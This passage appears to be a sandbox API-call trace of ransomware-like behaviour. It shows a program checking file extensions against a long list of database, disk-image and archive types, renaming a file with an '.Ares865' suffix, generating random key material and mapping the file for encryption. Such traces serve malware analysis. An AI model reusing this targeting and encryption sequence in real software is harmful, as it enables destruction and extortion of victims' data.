returned 19 [0092.841] lstrlenW (lpString="Ares865") returned 7 [0092.841] lstrcmpiW (lpString1="18q.lnk", lpString2="Ares865") returned -1 [0092.841] lstrlenW (lpString=".dll") returned 4 [0092.841] lstrcmpiW (lpString1="-nkAbxRjWZdB18q.lnk", lpString2=".dll") returned 1 [0092.841] lstrlenW (lpString=".lnk") returned 4 [0092.841] lstrcmpiW (lpString1="-nkAbxRjWZdB18q.lnk", lpString2=".lnk") returned 1 [0092.841] lstrlenW (lpString=".ini") returned 4 [0092.841] lstrcmpiW (lpString1="-nkAbxRjWZdB18q.lnk", lpString2=".ini") returned 1 [0092.841] lstrlenW (lpString=".sys") returned 4 [0092.841] lstrcmpiW (lpString1="-nkAbxRjWZdB18q.lnk", lpString2=".sys") returned 1 [0092.841] lstrlenW (lpString="-nkAbxRjWZdB18q.lnk") returned 19 [0092.841] lstrlenW (lpString="bak") returned 3 [0092.841] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0092.841] lstrlenW (lpString="ba_") returned 3 [0092.841] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0092.841] lstrlenW (lpString="dbb") returned 3 [0092.841] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0092.841] lstrlenW (lpString="vmdk") returned 4 [0092.841] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0092.842] lstrlenW (lpString="rar") returned 3 [0092.842] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0092.842] lstrlenW (lpString="zip") returned 3 [0092.842] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0092.842] lstrlenW (lpString="tgz") returned 3 [0092.842] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0092.842] lstrlenW (lpString="vbox") returned 4 [0092.842] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0092.842] lstrlenW (lpString="vdi") returned 3 [0092.842] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0092.842] lstrlenW (lpString="vhd") returned 3 [0092.842] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0092.842] lstrlenW (lpString="vhdx") returned 4 [0092.842] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0092.842] lstrlenW (lpString="avhd") returned 4 [0092.842] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0092.842] lstrlenW (lpString="db") returned 2 [0092.842] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0092.842] lstrlenW (lpString="db2") returned 3 [0092.842] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0092.842] lstrlenW (lpString="db3") returned 3 [0092.842] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0092.842] lstrlenW (lpString="dbf") returned 3 [0092.842] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0092.842] lstrlenW (lpString="mdf") returned 3 [0092.842] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0092.842] lstrlenW (lpString="mdb") returned 3 [0092.842] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0092.842] lstrlenW (lpString="sql") returned 3 [0092.842] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0092.842] lstrlenW (lpString="sqlite") returned 6 [0092.842] lstrcmpiW (lpString1="8q.lnk", lpString2="sqlite") returned -1 [0092.842] lstrlenW (lpString="sqlite3") returned 7 [0092.842] lstrcmpiW (lpString1="18q.lnk", lpString2="sqlite3") returned -1 [0092.842] lstrlenW (lpString="sqlitedb") returned 8 [0092.842] lstrcmpiW (lpString1="B18q.lnk", lpString2="sqlitedb") returned -1 [0092.843] lstrlenW (lpString="xml") returned 3 [0092.843] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0092.843] lstrlenW (lpString="$er") returned 3 [0092.843] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0092.843] lstrlenW (lpString="4dd") returned 3 [0092.843] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0092.843] lstrlenW (lpString="4dl") returned 3 [0092.843] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0092.843] lstrlenW (lpString="^^^") returned 3 [0092.843] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0092.843] lstrlenW (lpString="abs") returned 3 [0092.843] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0092.843] lstrlenW (lpString="abx") returned 3 [0092.843] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0092.843] lstrlenW (lpString="accdb") returned 5 [0092.843] lstrcmpiW (lpString1="q.lnk", lpString2="accdb") returned 1 [0092.843] lstrlenW (lpString="accdc") returned 5 [0092.843] lstrcmpiW (lpString1="q.lnk", lpString2="accdc") returned 1 [0092.843] lstrlenW (lpString="accde") returned 5 [0092.843] lstrcmpiW (lpString1="q.lnk", lpString2="accde") returned 1 [0092.843] lstrlenW (lpString="accdr") returned 5 [0092.843] lstrcmpiW (lpString1="q.lnk", lpString2="accdr") returned 1 [0092.843] lstrlenW (lpString="accdt") returned 5 [0092.843] lstrcmpiW (lpString1="q.lnk", lpString2="accdt") returned 1 [0092.843] lstrlenW (lpString="accdw") returned 5 [0092.843] lstrcmpiW (lpString1="q.lnk", lpString2="accdw") returned 1 [0092.843] lstrlenW (lpString="accft") returned 5 [0092.843] lstrcmpiW (lpString1="q.lnk", lpString2="accft") returned 1 [0092.843] lstrlenW (lpString="adb") returned 3 [0092.843] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.843] lstrlenW (lpString="adb") returned 3 [0092.843] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.843] lstrlenW (lpString="ade") returned 3 [0092.843] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0092.843] lstrlenW (lpString="adf") returned 3 [0092.843] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0092.844] lstrlenW (lpString="adn") returned 3 [0092.844] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0092.844] lstrlenW (lpString="adp") returned 3 [0092.844] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0092.844] lstrlenW (lpString="alf") returned 3 [0092.844] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0092.844] lstrlenW (lpString="ask") returned 3 [0092.844] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0092.844] lstrlenW (lpString="btr") returned 3 [0092.844] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0092.844] lstrlenW (lpString="cat") returned 3 [0092.844] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0092.844] lstrlenW (lpString="cdb") returned 3 [0092.844] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0092.844] lstrlenW (lpString="ckp") returned 3 [0092.844] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0092.844] lstrlenW (lpString="cma") returned 3 [0092.844] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0092.844] lstrlenW (lpString="cpd") returned 3 [0092.844] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0092.844] lstrlenW (lpString="dacpac") returned 6 [0092.844] lstrcmpiW (lpString1="8q.lnk", lpString2="dacpac") returned -1 [0092.844] lstrlenW (lpString="dad") returned 3 [0092.844] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0092.844] lstrlenW (lpString="dadiagrams") returned 10 [0092.844] lstrcmpiW (lpString1="ZdB18q.lnk", lpString2="dadiagrams") returned 1 [0092.844] lstrlenW (lpString="daschema") returned 8 [0092.844] lstrcmpiW (lpString1="B18q.lnk", lpString2="daschema") returned -1 [0092.844] lstrlenW (lpString="db-journal") returned 10 [0092.844] lstrcmpiW (lpString1="ZdB18q.lnk", lpString2="db-journal") returned 1 [0092.844] lstrlenW (lpString="db-shm") returned 6 [0092.844] lstrcmpiW (lpString1="8q.lnk", lpString2="db-shm") returned -1 [0092.844] lstrlenW (lpString="db-wal") returned 6 [0092.844] lstrcmpiW (lpString1="8q.lnk", lpString2="db-wal") returned -1 [0092.844] lstrlenW (lpString="dbc") returned 3 [0092.844] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0092.844] lstrlenW (lpString="dbs") returned 3 [0092.845] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0092.845] lstrlenW (lpString="dbt") returned 3 [0092.845] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0092.845] lstrlenW (lpString="dbv") returned 3 [0092.845] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0092.845] lstrlenW (lpString="dbx") returned 3 [0092.845] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0092.845] lstrlenW (lpString="dcb") returned 3 [0092.845] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0092.845] lstrlenW (lpString="dct") returned 3 [0092.845] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0092.845] lstrlenW (lpString="dcx") returned 3 [0092.845] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0092.845] lstrlenW (lpString="ddl") returned 3 [0092.845] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0092.845] lstrlenW (lpString="dlis") returned 4 [0092.845] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0092.845] lstrlenW (lpString="dp1") returned 3 [0092.845] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0092.845] lstrlenW (lpString="dqy") returned 3 [0092.845] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0092.845] lstrlenW (lpString="dsk") returned 3 [0092.845] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0092.845] lstrlenW (lpString="dsn") returned 3 [0092.845] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0092.845] lstrlenW (lpString="dtsx") returned 4 [0092.845] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0092.845] lstrlenW (lpString="dxl") returned 3 [0092.845] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0092.845] lstrlenW (lpString="eco") returned 3 [0092.845] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0092.845] lstrlenW (lpString="ecx") returned 3 [0092.845] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0092.845] lstrlenW (lpString="edb") returned 3 [0092.845] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0092.845] lstrlenW (lpString="epim") returned 4 [0092.846] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0092.846] lstrlenW (lpString="fcd") returned 3 [0092.846] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0092.846] lstrlenW (lpString="fdb") returned 3 [0092.846] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0092.846] lstrlenW (lpString="fic") returned 3 [0092.846] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0092.846] lstrlenW (lpString="flexolibrary") returned 12 [0092.846] lstrcmpiW (lpString1="jWZdB18q.lnk", lpString2="flexolibrary") returned 1 [0092.846] lstrlenW (lpString="fm5") returned 3 [0092.846] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0092.846] lstrlenW (lpString="fmp") returned 3 [0092.846] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0092.846] lstrlenW (lpString="fmp12") returned 5 [0092.846] lstrcmpiW (lpString1="q.lnk", lpString2="fmp12") returned 1 [0092.846] lstrlenW (lpString="fmpsl") returned 5 [0092.846] lstrcmpiW (lpString1="q.lnk", lpString2="fmpsl") returned 1 [0092.846] lstrlenW (lpString="fol") returned 3 [0092.846] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0092.846] lstrlenW (lpString="fp3") returned 3 [0092.846] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0092.846] lstrlenW (lpString="fp4") returned 3 [0092.846] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0092.846] lstrlenW (lpString="fp5") returned 3 [0092.846] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0092.846] lstrlenW (lpString="fp7") returned 3 [0092.846] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0092.846] lstrlenW (lpString="fpt") returned 3 [0092.846] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0092.846] lstrlenW (lpString="frm") returned 3 [0092.846] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0092.846] lstrlenW (lpString="gdb") returned 3 [0092.846] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0092.846] lstrlenW (lpString="gdb") returned 3 [0092.846] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0092.846] lstrlenW (lpString="grdb") returned 4 [0092.847] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0092.847] lstrlenW (lpString="gwi") returned 3 [0092.847] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0092.847] lstrlenW (lpString="hdb") returned 3 [0092.847] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0092.847] lstrlenW (lpString="his") returned 3 [0092.847] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0092.847] lstrlenW (lpString="ib") returned 2 [0092.847] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0092.847] lstrlenW (lpString="idb") returned 3 [0092.847] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0092.847] lstrlenW (lpString="ihx") returned 3 [0092.847] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0092.847] lstrlenW (lpString="itdb") returned 4 [0092.847] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0092.847] lstrlenW (lpString="itw") returned 3 [0092.847] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0092.847] lstrlenW (lpString="jet") returned 3 [0092.847] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0092.847] lstrlenW (lpString="jtx") returned 3 [0092.847] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0092.847] lstrlenW (lpString="kdb") returned 3 [0092.847] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0092.847] lstrlenW (lpString="kexi") returned 4 [0092.847] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0092.847] lstrlenW (lpString="kexic") returned 5 [0092.847] lstrcmpiW (lpString1="q.lnk", lpString2="kexic") returned 1 [0092.847] lstrlenW (lpString="kexis") returned 5 [0092.847] lstrcmpiW (lpString1="q.lnk", lpString2="kexis") returned 1 [0092.847] lstrlenW (lpString="lgc") returned 3 [0092.847] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0092.847] lstrlenW (lpString="lwx") returned 3 [0092.847] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0092.847] lstrlenW (lpString="maf") returned 3 [0092.847] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0092.847] lstrlenW (lpString="maq") returned 3 [0092.848] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0092.848] lstrlenW (lpString="mar") returned 3 [0092.848] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0092.848] lstrlenW (lpString="marshal") returned 7 [0092.848] lstrcmpiW (lpString1="18q.lnk", lpString2="marshal") returned -1 [0092.848] lstrlenW (lpString="mas") returned 3 [0092.848] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0092.848] lstrlenW (lpString="mav") returned 3 [0092.848] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0092.848] lstrlenW (lpString="maw") returned 3 [0092.848] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0092.848] lstrlenW (lpString="mdbhtml") returned 7 [0092.848] lstrcmpiW (lpString1="18q.lnk", lpString2="mdbhtml") returned -1 [0092.848] lstrlenW (lpString="mdn") returned 3 [0092.848] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0092.848] lstrlenW (lpString="mdt") returned 3 [0092.848] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0092.848] lstrlenW (lpString="mfd") returned 3 [0092.848] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0092.848] lstrlenW (lpString="mpd") returned 3 [0092.848] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0092.848] lstrlenW (lpString="mrg") returned 3 [0092.848] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0092.848] lstrlenW (lpString="mud") returned 3 [0092.848] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0092.848] lstrlenW (lpString="mwb") returned 3 [0092.848] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0092.848] lstrlenW (lpString="myd") returned 3 [0092.848] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0092.848] lstrlenW (lpString="ndf") returned 3 [0092.848] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0092.848] lstrlenW (lpString="nnt") returned 3 [0092.848] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0092.848] lstrlenW (lpString="nrmlib") returned 6 [0092.848] lstrcmpiW (lpString1="8q.lnk", lpString2="nrmlib") returned -1 [0092.848] lstrlenW (lpString="ns2") returned 3 [0092.849] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0092.849] lstrlenW (lpString="ns3") returned 3 [0092.849] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0092.849] lstrlenW (lpString="ns4") returned 3 [0092.849] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0092.849] lstrlenW (lpString="nsf") returned 3 [0092.849] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0092.849] lstrlenW (lpString="nv") returned 2 [0092.849] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0092.849] lstrlenW (lpString="nv2") returned 3 [0092.849] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0092.849] lstrlenW (lpString="nwdb") returned 4 [0092.849] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0092.849] lstrlenW (lpString="nyf") returned 3 [0092.849] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0092.849] lstrlenW (lpString="odb") returned 3 [0092.849] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0092.849] lstrlenW (lpString="odb") returned 3 [0092.849] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0092.849] lstrlenW (lpString="oqy") returned 3 [0092.849] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0092.849] lstrlenW (lpString="ora") returned 3 [0092.849] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0092.849] lstrlenW (lpString="orx") returned 3 [0092.849] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0092.849] lstrlenW (lpString="owc") returned 3 [0092.849] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0092.849] lstrlenW (lpString="p96") returned 3 [0092.849] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0092.849] lstrlenW (lpString="p97") returned 3 [0092.849] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0092.849] lstrlenW (lpString="pan") returned 3 [0092.849] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0092.849] lstrlenW (lpString="pdb") returned 3 [0092.849] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0092.849] lstrlenW (lpString="pdm") returned 3 [0092.850] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0092.850] lstrlenW (lpString="pnz") returned 3 [0092.850] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0092.850] lstrlenW (lpString="qry") returned 3 [0092.850] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0092.850] lstrlenW (lpString="qvd") returned 3 [0092.850] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0092.850] lstrlenW (lpString="rbf") returned 3 [0092.850] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0092.850] lstrlenW (lpString="rctd") returned 4 [0092.850] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0092.850] lstrlenW (lpString="rod") returned 3 [0092.850] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0092.850] lstrlenW (lpString="rodx") returned 4 [0092.850] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0092.850] lstrlenW (lpString="rpd") returned 3 [0092.850] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0092.850] lstrlenW (lpString="rsd") returned 3 [0092.850] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0092.850] lstrlenW (lpString="sas7bdat") returned 8 [0092.850] lstrcmpiW (lpString1="B18q.lnk", lpString2="sas7bdat") returned -1 [0092.850] lstrlenW (lpString="sbf") returned 3 [0092.850] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0092.850] lstrlenW (lpString="scx") returned 3 [0092.850] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0092.850] lstrlenW (lpString="sdb") returned 3 [0092.850] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0092.850] lstrlenW (lpString="sdc") returned 3 [0092.850] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0092.850] lstrlenW (lpString="sdf") returned 3 [0092.850] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0092.850] lstrlenW (lpString="sis") returned 3 [0092.850] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0092.850] lstrlenW (lpString="spq") returned 3 [0092.850] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0092.850] lstrlenW (lpString="te") returned 2 [0092.851] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0092.851] lstrlenW (lpString="teacher") returned 7 [0092.851] lstrcmpiW (lpString1="18q.lnk", lpString2="teacher") returned -1 [0092.851] lstrlenW (lpString="tmd") returned 3 [0092.851] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0092.851] lstrlenW (lpString="tps") returned 3 [0092.851] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0092.851] lstrlenW (lpString="trc") returned 3 [0092.851] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0092.851] lstrlenW (lpString="trc") returned 3 [0092.851] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0092.851] lstrlenW (lpString="trm") returned 3 [0092.851] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0092.851] lstrlenW (lpString="udb") returned 3 [0092.851] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0092.851] lstrlenW (lpString="udl") returned 3 [0092.851] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0092.851] lstrlenW (lpString="usr") returned 3 [0092.851] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0092.851] lstrlenW (lpString="v12") returned 3 [0092.851] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0092.851] lstrlenW (lpString="vis") returned 3 [0092.851] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0092.851] lstrlenW (lpString="vpd") returned 3 [0092.851] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0092.851] lstrlenW (lpString="vvv") returned 3 [0092.851] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0092.851] lstrlenW (lpString="wdb") returned 3 [0092.851] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0092.851] lstrlenW (lpString="wmdb") returned 4 [0092.851] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0092.851] lstrlenW (lpString="wrk") returned 3 [0092.851] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0092.851] lstrlenW (lpString="xdb") returned 3 [0092.851] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0092.851] lstrlenW (lpString="xld") returned 3 [0092.852] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0092.852] lstrlenW (lpString="xmlff") returned 5 [0092.852] lstrcmpiW (lpString1="q.lnk", lpString2="xmlff") returned -1 [0092.852] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\-nkAbxRjWZdB18q.lnk.Ares865") returned 64 [0092.852] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\-nkAbxRjWZdB18q.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\-nkabxrjwzdb18q.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\-nkAbxRjWZdB18q.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\-nkabxrjwzdb18q.lnk.ares865"), dwFlags=0x1) returned 1 [0092.853] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\-nkAbxRjWZdB18q.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\-nkabxrjwzdb18q.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.854] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6564) returned 1 [0092.854] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.854] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.854] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.854] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.855] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.855] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.855] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1cb0, lpName=0x0) returned 0x15c [0092.855] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1cb0) returned 0x190000 [0092.855] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.856] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.856] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.856] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.856] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.856] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.856] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.856] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.856] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.856] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0092.857] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.857] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0092.857] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.857] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.857] CloseHandle (hObject=0x15c) returned 1 [0092.857] CloseHandle (hObject=0x118) returned 1 [0092.858] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.858] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.858] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.858] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a27b080, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3a27b080, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x3a27b080, ftLastWriteTime.dwHighDateTime=0x1d56a3b, 